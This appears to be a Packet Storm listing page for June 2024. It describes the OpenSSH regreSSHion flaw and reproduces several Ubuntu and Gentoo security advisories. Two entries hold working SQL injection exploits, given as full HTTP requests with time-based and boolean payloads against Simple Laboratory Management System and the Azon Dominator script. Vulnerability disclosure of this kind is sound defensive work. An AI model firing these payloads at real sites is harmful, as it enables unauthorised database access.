This archive contains all of the 65 exploits added to Packet Storm in June, 2024.

Packet Storm New Exploits For June, 2024

Qualys has discovered a a signal handler race condition vulnerability in OpenSSH's server, sshd. If a client does not authenticate within LoginGraceTime seconds (120 by default, 600 in old OpenSSH versions), then sshd's SIGALRM handler is called asynchronously, but this signal handler calls various functions that are not async-signal-safe - for example, syslog(). This race condition affects sshd in its default configuration.

OpenSSH Server regreSSHion Remote Code Execution

This is a Linux/portable port of OpenBSD's excellent OpenSSH. OpenSSH is based on the last free version of Tatu Ylonen's SSH with all patent-encumbered algorithms removed, all known security bugs fixed, new features reintroduced, and many other clean-ups.

OpenSSH 9.8p1

Ubuntu Security Notice 6858-1 - It was discovered that eSpeak NG did not properly manage memory under certain circumstances. An attacker could possibly use this issue to cause a denial of service, or execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6858-1July 01, 2024espeak-ng vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.10- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in eSpeak NG.Software Description:- espeak-ng: Multi-lingual software speech synthesizerDetails:It was discovered that eSpeak NG did not properly manage memory under certaincircumstances. An attacker could possibly use this issue to cause a denialof service, or execute arbitrary code. (CVE-2023-49990, CVE-2023-49991,CVE-2023-49992, CVE-2023-49993, CVE-2023-49994)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.10  espeak-ng                       1.51+dfsg-11ubuntu0.1  espeak-ng-espeak                1.51+dfsg-11ubuntu0.1Ubuntu 22.04 LTS  espeak-ng                       1.50+dfsg-10ubuntu0.1  espeak-ng-espeak                1.50+dfsg-10ubuntu0.1Ubuntu 20.04 LTS  espeak-ng                       1.50+dfsg-6ubuntu0.1  espeak-ng-espeak                1.50+dfsg-6ubuntu0.1Ubuntu 18.04 LTS  espeak-ng                       1.49.2+dfsg-1ubuntu0.1~esm1                                  Available with Ubuntu Pro  espeak-ng-espeak                1.49.2+dfsg-1ubuntu0.1~esm1                                  Available with Ubuntu ProIn general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6858-1  CVE-2023-49990, CVE-2023-49991, CVE-2023-49992, CVE-2023-49993,  CVE-2023-49994Package Information:  https://launchpad.net/ubuntu/+source/espeak-ng/1.51+dfsg-11ubuntu0.1  https://launchpad.net/ubuntu/+source/espeak-ng/1.50+dfsg-10ubuntu0.1  https://launchpad.net/ubuntu/+source/espeak-ng/1.50+dfsg-6ubuntu0.1

Ubuntu Security Notice USN-6858-1

Gentoo Linux Security Advisory 202407-6 - Multiple vulnerabilities have been discovered in cryptography, the worst of which could lead to a denial of service. Versions greater than or equal to 42.0.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202407-06  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: cryptography: Multiple Vulnerabilities  
     Date: July 01, 2024  
     Bugs: #769419, #864049, #893576, #918685, #925120  
       ID: 202407-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in cryptography, the worst  
of which could lead to a denial of service.

Background  
==========

cryptography is a package which provides cryptographic recipes and  
primitives to Python developers.

Affected packages  
=================

Package                  Vulnerable    Unaffected  
-----------------------  ------------  ------------  
dev-python/cryptography  < 42.0.4      >= 42.0.4

Description  
===========

Multiple vulnerabilities have been discovered in cryptography. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All cryptography users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-python/cryptography-42.0.4"

References  
==========

[ 1 ] CVE-2020-36242  
      https://nvd.nist.gov/vuln/detail/CVE-2020-36242  
[ 2 ] CVE-2023-23931  
      https://nvd.nist.gov/vuln/detail/CVE-2023-23931  
[ 3 ] CVE-2023-49083  
      https://nvd.nist.gov/vuln/detail/CVE-2023-49083  
[ 4 ] CVE-2024-26130  
      https://nvd.nist.gov/vuln/detail/CVE-2024-26130

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202407-06

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202407-06

Gentoo Linux Security Advisory 202407-5 - A vulnerability has been discovered in SSSD, which can lead to arbitrary code execution. Versions greater than or equal to 2.5.2-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202407-05  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: SSSD: Command Injection  
     Date: July 01, 2024  
     Bugs: #808911  
       ID: 202407-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in SSSD, which can lead to arbitrary  
code execution.

Background  
==========

SSSD provides a set of daemons to manage access to remote directories  
and authentication mechanisms such as LDAP, Kerberos or FreeIPA. It  
provides an NSS and PAM interface toward the system and a pluggable  
backend system to connect to multiple different account sources.

Affected packages  
=================

Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
sys-auth/sssd  < 2.5.2-r1    >= 2.5.2-r1

Description  
===========

A vulnerability has been discovered in SSSD. Please review the CVE  
identifier referenced below for details.

Impact  
======

A flaw was found in SSSD, where the sssctl command was vulnerable to  
shell command injection via the logs-fetch and cache-expire subcommands.  
This flaw allows an attacker to trick the root user into running a  
specially crafted sssctl command, such as via sudo, to gain root access.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All SSSD users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-auth/sssd-2.5.2-r1"

References  
==========

[ 1 ] CVE-2021-3621  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3621

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202407-05

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202407-05

Simple Laboratory Management System version 1.0 suffers from a remote time-based SQL injection vulnerability.

    # Exploit Title: Simple Laboratory Management System - Manual Blind Time Based SQL Injection# Exploit Description: A SQL Injection vulnerability in Computer Laboratory Management System v1.0 allows attackers to execute arbitrary SQL commands on the database server which causes the services to delay in response time.# Affected Asset: The "delete_users" function in Users.php inside the Computer Laboratory Management System v1.0 application is vulnerable to Blind Time Based SQL Injection.# Exploit Author: Smitha Bhabal# Date: 2024-06-30# Vendor Homepage: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-lms.zip# Version: 1.0# Tested On: Windows 11 Home 22631.3737 + XAMPP 3.3.0 (April 6th 2021)# Reference: https://github.com/payloadbox/sql-injection-payload-listPOST /php-lms/classes/Users.php?f=delete HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-GB,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveCookie: PHPSESSID=1bfs2uc82iaorimhamvfj2qi6uUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1DNT: 1Sec-GPC: 1Priority: u=1Content-Length: 45Content-Type: application/x-www-form-urlencodedid=(select%20*%20from%20(select(sleep(20)))a)

Simple Laboratory Management System 1.0 SQL Injection

Ubuntu Security Notice 6855-1 - Mansour Gashasbi discovered that libcdio incorrectly handled certain memory operations when parsing an ISO file, leading to a buffer overflow vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6855-1  
June 28, 2024

libcdio vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS  
- Ubuntu 14.04 LTS

Summary:

libcdio could be made to crash or run programs as your login if it  
opened a specially crafted file.

Software Description:  
- libcdio: C++ library to read and control CD-ROM (development files)

Details:

Mansour Gashasbi discovered that libcdio incorrectly handled certain  
memory operations when parsing an ISO file, leading to a buffer overflow  
vulnerability. An attacker could use this to cause a denial of service  
or possibly execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
   libcdio++1t64                   2.1.0-4.1ubuntu1.2  
   libcdio19t64                    2.1.0-4.1ubuntu1.2  
   libiso9660++0t64                2.1.0-4.1ubuntu1.2  
   libiso9660-11t64                2.1.0-4.1ubuntu1.2  
   libudf0t64                      2.1.0-4.1ubuntu1.2

Ubuntu 23.10  
   libcdio++1                      2.1.0-4ubuntu0.2  
   libcdio19                       2.1.0-4ubuntu0.2  
   libiso9660++0                   2.1.0-4ubuntu0.2  
   libiso9660-11                   2.1.0-4ubuntu0.2  
   libudf0                         2.1.0-4ubuntu0.2

Ubuntu 22.04 LTS  
   libcdio++1                      2.1.0-3ubuntu0.2  
   libcdio19                       2.1.0-3ubuntu0.2  
   libiso9660++0                   2.1.0-3ubuntu0.2  
   libiso9660-11                   2.1.0-3ubuntu0.2  
   libudf0                         2.1.0-3ubuntu0.2

Ubuntu 20.04 LTS  
   libcdio18                       2.0.0-2ubuntu0.2  
   libiso9660-11                   2.0.0-2ubuntu0.2  
   libudf0                         2.0.0-2ubuntu0.2

Ubuntu 18.04 LTS  
   libcdio17                       1.0.0-2ubuntu2+esm2  
                                   Available with Ubuntu Pro  
   libiso9660-10                   1.0.0-2ubuntu2+esm2  
                                   Available with Ubuntu Pro  
   libudf0                         1.0.0-2ubuntu2+esm2  
                                   Available with Ubuntu Pro

Ubuntu 16.04 LTS  
   libcdio13                       0.83-4.2ubuntu1+esm3  
                                   Available with Ubuntu Pro  
   libiso9660-8                    0.83-4.2ubuntu1+esm3  
                                   Available with Ubuntu Pro  
   libudf0                         0.83-4.2ubuntu1+esm3  
                                   Available with Ubuntu Pro

Ubuntu 14.04 LTS  
   libcdio13                       0.83-4.1ubuntu1+esm3  
                                   Available with Ubuntu Pro  
   libiso9660-8                    0.83-4.1ubuntu1+esm3  
                                   Available with Ubuntu Pro  
   libudf0                         0.83-4.1ubuntu1+esm3  
                                   Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6855-1  
   CVE-2024-36600

Package Information:  
   https://launchpad.net/ubuntu/+source/libcdio/2.1.0-4.1ubuntu1.2  
   https://launchpad.net/ubuntu/+source/libcdio/2.1.0-4ubuntu0.2  
   https://launchpad.net/ubuntu/+source/libcdio/2.1.0-3ubuntu0.2  
   https://launchpad.net/ubuntu/+source/libcdio/2.0.0-2ubuntu0.2

Ubuntu Security Notice USN-6855-1

Gentoo Linux Security Advisory 202406-6 - Multiple vulnerabilities have been discovered in GStreamer and GStreamer Plugins, the worst of which could lead to code execution. Versions greater than or equal to 1.22.11-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202406-06  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: GStreamer, GStreamer Plugins: Multiple Vulnerabilities  
     Date: June 28, 2024  
     Bugs: #917791, #918095  
       ID: 202406-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in GStreamer and GStreamer  
Plugins, the worst of which could lead to code execution.

Background  
==========

GStreamer is an open source multimedia framework.

Affected packages  
=================

Package                     Vulnerable    Unaffected  
--------------------------  ------------  -------------  
media-libs/gst-plugins-bad  < 1.22.11-r1  >= 1.22.11-r1  
media-libs/gstreamer        < 1.22.11     >= 1.22.11

Description  
===========

Multiple vulnerabilities have been discovered in GStreamer, GStreamer  
Plugins. Please review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All GStreamer, GStreamer Plugins users should upgrade to the latest  
versions:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/gstreamer-1.22.11" ">=media-libs/gst-plugins-bad-1.22.11-r1"

References  
==========

[ 1 ] CVE-2023-40474  
      https://nvd.nist.gov/vuln/detail/CVE-2023-40474  
[ 2 ] CVE-2023-40475  
      https://nvd.nist.gov/vuln/detail/CVE-2023-40475  
[ 3 ] CVE-2023-40476  
      https://nvd.nist.gov/vuln/detail/CVE-2023-40476  
[ 4 ] CVE-2023-44429  
      https://nvd.nist.gov/vuln/detail/CVE-2023-44429  
[ 5 ] CVE-2023-44446  
      https://nvd.nist.gov/vuln/detail/CVE-2023-44446  
[ 6 ] ZDI-CAN-21660  
[ 7 ] ZDI-CAN-21661  
[ 8 ] ZDI-CAN-21768  
[ 9 ] ZDI-CAN-22226  
[ 10 ] ZDI-CAN-22299

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202406-06

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202406-06

Azon Dominator Affiliate Marketing Script suffers from a remote SQL injection vulnerability.

    # Exploit Title: Azon Dominator - Affiliate Marketing Script - SQL Injection# Date: 2024-06-03# Exploit Author: Buğra Enis Dönmez# Vendor: https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script# Demo Site: https://azon-dominator.webister.net/# Tested on: Arch Linux# CVE: N/A### Request ###POST /fetch_products.php HTTP/1.1Content-Type: application/x-www-form-urlencodedAccept: */*x-requested-with: XMLHttpRequestReferer: https://localhost/Cookie: PHPSESSID=crlcn84lfvpe8c3732rgj3gegg; sc_is_visitor_unique=rx12928762.1717438191.4D4FA5E53F654F9150285A1CA42E7E22.8.8.8.8.8.8.8.8.8Content-Length: 79Accept-Encoding: gzip,deflate,brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: localhostConnection: Keep-alivecid=1*if(now()=sysdate()%2Csleep(6)%2C0)&max_price=124&minimum_range=0&sort=112###### Parameter & Payloads ###Parameter: cid (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: cid=1) AND 7735=7735 AND (5267=5267    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: cid=1) AND (SELECT 7626 FROM (SELECT(SLEEP(5)))yOxS) AND (8442=8442###

Latest News